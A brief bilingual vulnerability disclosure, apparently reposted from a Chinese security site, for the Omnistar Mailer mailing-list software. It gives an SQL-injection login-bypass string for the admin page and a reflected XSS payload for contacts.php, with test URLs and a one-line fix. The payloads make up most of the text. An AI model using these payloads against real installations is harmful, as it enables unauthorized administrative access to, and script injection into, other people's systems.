标题: Omnistar Mailer SQLi Vulnerability
开发者官网: http://www.omnistarmailer.com/ www.2cto.com
作者: Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
描述:
Are you a business and your are looking to increase your profit? Omnistar mailing list software will
allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.
1.管理验证缺陷
万能密码:' or 1=1 or ''='
测试URL
http://www.2cto.com /mailerd4/admin/index.php
2.XSS
Attack pattern :"><script>alert("Sid3^effects")</script>
测试url :http://www.2cto.com /mailerd4/admin/contacts.php?op=[xss]
修复:加强验证,过滤
# 0day no more
# Sid3^effects
查看更多关于Omnistar Mailer多重缺陷及修复 - 网站安全 - 自学p的详细内容...